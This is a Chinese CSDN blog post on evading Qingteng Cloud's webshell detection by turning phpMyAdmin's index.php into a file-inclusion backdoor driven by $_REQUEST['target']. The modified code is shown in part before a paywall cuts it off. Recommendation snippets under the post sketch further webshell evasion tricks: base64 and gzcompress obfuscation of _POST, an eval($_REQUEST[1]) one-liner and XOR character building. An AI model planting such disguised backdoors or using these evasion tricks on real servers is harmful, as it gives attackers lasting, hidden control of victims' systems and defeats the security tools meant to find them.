青藤云Webshell查杀绕过

最新推荐文章于 2024-08-31 21:48:53 发布
最新推荐文章于 2024-08-31 21:48:53 发布
阅读量1.4k 收藏 2
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/glawhack/article/details/105068476
版权
本文介绍了作者如何通过修改开源程序并插入一句话后门成功绕过青藤云的Webshell检测。作者首先发现青藤云的检测机制可能基于深度学习的有监督方式,然后选择了一个经过过滤和判断处理的Phpmyadmin文件,修改为包含任意文件并保留部分源码。测试结果显示绕过成功,但同时也注意到存在误报问题。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

上周看到一些朋友在发青藤云的聊天记录,绕过一个发200块红包。周末的时候就简单做了个测试。
首先使用绕过D盾的webshell,发现被标记为恶意。这就有点意思了。我去看了一下聊天记录的内容,看原理是采用的深度学习的方式。猜测是有监督的方式来实现的(仅为猜测)。我这里绕过的思路采用的是,使用开源程序进行修改,带入一句话后门代码。

记得Phpmyadmin的index.php文件中包含有include ROOT_PATH . $_REQUEST['target'];这样的代码,如果不看上下文,这个妥妥的文件包含漏洞。不过上文有过滤和判断处理,导致无法包含任意文件。我将其修改为包含任意文件。同时保留来一些源码,把影响执行的代码注释掉(因为适应多种环境,适用但文件的情况)。
最终修改的代码如下:

<?php
/* vim: set expandtab sw=4 ts=4 sts=4: */
/**
 * Main loader script
 *
 * @package PhpMyAdmin
 */
declare(strict_types=1);
/*
use PhpMyAdmin\Controllers\HomeController;
use PhpMyAdmin\Core;
use PhpMyAdmin\DatabaseInterface;
use PhpMyAdmin\Response;
use PhpMyAdmin\Url;
use PhpMyAdmin\Util;
*/
if (! defined('ROOT_PATH')) {
    define('ROOT_PATH', '');   //这里做了修改,不影响后门包
最低0.47元/天 解锁文章
不可不学!一些webshell免杀的技巧
Appleteachers的博客
05-07 972
一些webshell免杀的技巧 0x00:前言 由于杀软的规则在不断更新 所以很多之前的过杀软方法基本上都不行了 而且随着php7逐渐扩张 assert马也将被淘汰 所以本文将提出几种免杀思路 效果很好 而且不会被杀软的正则和沙盒规则约束。 0x01:自定义加密Bypass 部分杀软会直接将一些编码函数如Base64、编码后的关键字或组合函数加入了规则 比如某dir+ 比如这个 都能被检测出是shell 所以为了防止这种的规则 自定义加密显然是最优解 自定义加密可选性多了 只要能把加密后的字符还原回去就行
网络安全相关面试题(hw)
XLbb的博客
05-23 1557
7、敏感信息收集,如 github 源码、用 7kb、破壳扫源代码泄露(.hg、.git、cvs、svn、.DS_store 源代码泄露)、google hack、接口信息泄露、社工信息泄露、邮箱地址信息收集、网盘搜索、钟馗之眼、天眼查、威胁情报、微步在线等。3、可以使用 D 盾_web 查杀工具、火绒剑、 XueTr 等工具进行判 断可疑进程(如蓝色、红色进程、没有签名验证信息的进程、没有 描述信息的进程、进程的属主、进程的路径是否合法、 CPU 或内存资源占用长时间过高的进程)
中转Webshell 绕过安全狗(一)
weixin_30311605的博客
06-21 215
前言 听说中国菜刀里有后门。抓包我是没有监测到异常数据包。为了以防万一,且更好使用中国菜刀硬杠安全狗。笔者收集了一下资料。无耻的copy大佬的源码,只是在大佬的基础上简单修改了一下,达到Webshell绕过安全狗。原理 菜刀不直接向shell发送数据,而是发送到中转的一个页面上,这个页面对接收的参数全部进行加密,然后再发送给shell,shell接收后用同样的算法进行解密,执行命令。 客户...
中转Webshell 绕过安全狗(二)
weixin_30800807的博客
06-21 257
前言 在实践中转webshell绕过安全狗(一)中,在服务端和客户端均为php。某大佬提示并分享资源后,打算使用python完成中转。部分代码无耻copy。 客户端 本地127.0.0.1,安装python2phpshellproxy.py #coding=utf-8 import sys reload(sys) sys.setdefaultencoding('utf-...
Webshell的过滤绕过
hdlaichi_的博客
08-19 761
将把 a 变成 '['('Z' 的 ASCII 值是 90,'[' 的 ASCII 值是 91)。在PHP中,两个变量进行异或时,先会将字符串转换成ASCII值,再将ASCII值转换成二进制再进行异或,异或完,又将结果从二进制转换成了ASCII值,再将ASCII值转换成字符串。也就是说,'a'++ => 'b','b'++ => 'c'... 所以,我们只要能拿到一个变量,其值为a,通过自增操作即可获得a-z中所有字符。异或的二进制的值是00100001,对应的ASCII值是33,对应的字符串的值就是"!
webshell静态检测的绕过
qq_61142406的博客
03-23 3536
一句话木马原理: 基于_POST,[]等的检测 base64编码: $b = base64_encode(‘_POST’); echo $b; echo ‘<br/>’; echo base64_decode($b); gzcompress压缩: $c = gzcompress('_POST'); echo $c; echo '<br/>'; echo gzuncompress($c); 注释: @${$__}[!$_](${$__}[$_]);@$_="s"."s"./*-/*
记一次学习--webshell绕过
最新发布
banliyaoguai的博客
08-31 1082
这道题目要读取flag,且当前目录下的文件数目要大于三才可以读取,然后这里的思路就是创建文件。上面题目,下面的call_user_func有一个可变长参数,这个可变长参数是$parameters然后上面有一个if语句判断$parameters是否有action,如果有就删除掉,然后再action参数传system,在parameters传你要执行的命令。我们这里也要想办法利用A中的f,这个就要利用ob_start,ob_start调用例子,这里和call_user_func调用差不多。
webshell的过滤绕过
middlecorn的博客
08-20 642
将把 a 变成 '['('Z' 的 ASCII 值是 90,'[' 的 ASCII 值是 91)。在PHP中,两个变量进行异或时,先会将字符串转换成ASCII值,再将ASCII值转换成二进制再进行异或,异或完,又将结果从二进制转换成了ASCII值,再将ASCII值转换成字符串。也就是说,'a'++ => 'b','b'++ => 'c'... 所以,我们只要能拿到一个变量,其值为a,通过自增操作即可获得a-z中所有字符。异或的二进制的值是00100001,对应的ASCII值是33,对应的字符串的值就是"!
河马php一句话木马,一句话木马的套路
weixin_42127020的博客
03-10 392
0x01 前言尽最大努力在一文中让大家掌握一些有用的 WEBSHELL 免杀技巧。0x02 关于 eval 于 assert关于 eval 函数在 php 给出的官方说明是eval 是一个语言构造器而不是一个函数,不能被 可变函数 调用可变函数:通过一个变量,获取其对应的变量值,然后通过给该值增加一个括号 (),让系统认为该值是一个函数,从而当做函数来执行通俗的说比如你这样是不行的 也造就了用...
webshell免杀之数据特征绕过
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
11-20 422
webshell免杀之数据特征绕过
青藤云安全产品使用手册.pdf
12-09
青藤专注于服务端主机的安全防护,提供持续的安全监控、分析和快速响应能力,能够在 公有云、私有云、混合云、物理机、虚拟机等各种业务环境下实现安全的统一策略管理和快速 的入侵响应能力。 青藤的产品可以很方便地和各种云平台及传统服务器结合,能够在全球范围内轻易部署。 使用产品不需要购买硬件,不需要复杂的配置,学习成本低,但精确度极高。青藤的产品向企 业的运维和安全人员提供了安全管理海量服务器的能力,使得用户在降低成本、缺乏安全专业 知识的前提下,也能极大地提高企业的安全防护能力。 青藤采用的 Adaptive Security 架构是 Gartner 提出的面向未来十年的企业安全架构,能够 在复杂和变化的环境下有效抵御高级攻击,是整个安全行业的发展方向。其创新之处在于:一 方面将安全视角转移到防火墙之后的业务系统内部,强调基于业务、自内而外地构建安全体 系,另一方面将安全从传统的安全事件防护变成一项持续安全响应和处理过程,从多个维度持 续地保护了企业安全。 安全是一个持续化的过程,青藤产品有快速、灵活、可扩展的特点,可以将现有的安全技 术与持续运营的安全模型相结合,给用户提供一个持续化的动态安全解决方案。青藤产品提供 统一安全管理平台,统一的安全框架和灵活的社区交互能力,将安全的价值最大化。
WEB渗透学习笔记7——webshell及上传绕过
林林木林林L的博客
08-01 3505
webshell 概念 web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,WebShell是一种用来进行网站和服务器管理的脚本程序,webshell一般是被网站管理员用于网站管理、服务器管理等等一些用途,但是由于webshell的功能比较强大,可以上传下载文件,查看数据库,甚至可以调用一些服务器上系统的相关命令(比如创建用户,修改删除文件之类的),通常被黑客利用,黑客通过一些上传方式,将自己编写的webshell上传到web服务器的页面的目录下,攻击者通过上传WebShell获得Web服
小识.htaccess文件
aijie6150的博客
10-18 343
.htaccess文件(或者"分布式配置文件")提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。 概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过ht...
渗透测试 | php的webshell绕过方法总结
2301_80115097的博客
12-26 626
这里设置一个用户自定义函数a,当里面有参数时,返回该参数的内容,这里shell里的a($_REQUEST)[1] 的实际效果为 a($_REQUEST),相当于是a($a),会返回$a的内容,结果为$_REQUEST,最后一行的实际内容为eval($_REQUEST[1]);测试可以正常连接phpclass User?
常见 Webshell 的检测方法及检测绕过思路
niuyisheng的专栏
09-22 6882
Webshell的因素 我们从一个最简单的webshell结构可以看出其基本结构:“” 从目前被公布的一句话webshell来看,基本都符合这个结构,即shell的实现需要两步:数据的传递、执行所传递的数据。 数据传递&绕过检测 对于数据传递,我们通常的做法是使用$_GET、$_POST、$_SERVER、$_COOKIE等获取客户端数据。但这类关键词如果直接出现的
webshell技巧
qq_27862405的博客
08-05 1121
webshell技巧
网络安全防护之主机病毒查杀
m0_63828240的博客
07-05 772
越来越多的企业因病毒入侵造成难以估计的财产损失,病毒问题一直困扰着众多企业,今天青藤小编就主机病毒查杀来详细说下。
明明已部署EDR,服务器为什么还是被入侵了?
m0_63828240的博客
05-24 1662
主机是一个统称,所有服务器(虚拟机)都是主机,但并非所有主机都是服务器,也就是服务器⫋主机。
一文读懂什么是EPP、EDR、CWPP、HIDS及业内主流产品
热门推荐
weixin_43909140的博客
04-26 3万+
一文读懂什么是EPP、EDR、CWPP、HIDS及业内主流产品 当前终端安全概念包括:针对云工作负载保护平台cwpp、端点防护平台epp和终端全检测响应平台edr。HIDS品类(长亭牧云、青藤万相)更倾向于CWPP的落地产品。 1、EPP与EDR 如果通俗的讲可以理解成传统防病毒和下一代防病毒软件(其实EPP之前的阶段才是传统杀毒),但实际上EDR是个方案,深信服EDR、奇安信天擎、安恒明御对外宣传都是EDR产品,从产品能力严谨来讲,这些产品属于EPP+EDR的方案结合产物,其中EPP解决...
蚁剑绕过腾讯云webshell查杀
08-18
蚁剑是一种功能强大的网络攻击工具,可以用于绕过腾讯云等系统的WebShell查杀功能。 蚁剑的主要原理是通过传输恶意代码的方式绕过腾讯云的WebShell查杀机制。腾讯云的WebShell查杀功能通常是通过检测和过滤具有恶意代码特征的文件或代码来进行的。然而,蚁剑可以使用一些技术手段来隐藏恶意代码,使其不容易被腾讯云的查杀机制所发现。 首先,蚁剑可以对恶意代码进行加密或混淆处理。通过对代码进行加密或使用特定的编码方式,可以将恶意代码的内容变得晦涩难懂,使其难以被腾讯云查杀引擎所识别。 其次,蚁剑还可以利用一些反查杀技术来规避腾讯云的查杀机制。例如,蚁剑可以检测到目标系统上的查杀程序,并在检测到时自动切换为其他的隐藏模式,以避免被检测到和查杀。 此外,蚁剑还具有自动适应性的特点。它可以根据不同的环境和系统自动调整自身的工作方式,使其更加隐蔽和难以被腾讯云等WebShell查杀机制察觉。 然而,作为一个网络攻击工具,蚁剑违反了法律规定,并且会给网络系统的安全带来风险。因此,在任何情况下,我们都不鼓励和支持使用蚁剑等类似工具进行非法活动。维护网络安全,应该是我们的共同责任,我们应该遵守法律规定,不从事网络攻击和破坏行为。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值